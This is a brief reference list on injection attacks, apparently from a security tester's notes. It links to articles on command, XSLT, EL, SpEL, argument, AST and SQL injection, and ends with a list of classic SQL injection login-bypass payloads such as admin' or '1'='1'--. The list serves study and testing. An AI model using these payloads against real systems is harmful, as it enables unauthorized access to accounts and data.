Injection
References for Injection Attacks
Blogs / Articles:
Blind Command Injection - SSRF - https://threat.tevora.com/stop-collaborate-and-listen/
Practical JSONP Injection
XSLT Server Side Injection Attacks - https://contextis.com/blog/xslt-server-side-injection-attacks
Remote Code Execution with EL injection - https://betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html
Argument Injection - https://staaldraad.github.io/post/2019-11-24-argument-injection/
AST Injection, Prototype Pollution to RCE - https://blog.p6.is/AST-Injection/#How-to-Detect
SQL Injection - https://twitter.com/rodoassis/status/1438186092486877190?s=20
Payloads / Cheatsheets:
Twitter Threads / Tips:
SPEL Injection - https://twitter.com/h1pmnh/status/1425831338234589184?s=20
EL Injection
Tools:
Other References:
' or ''-'
" or ""-"
" or true--
' or true--
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*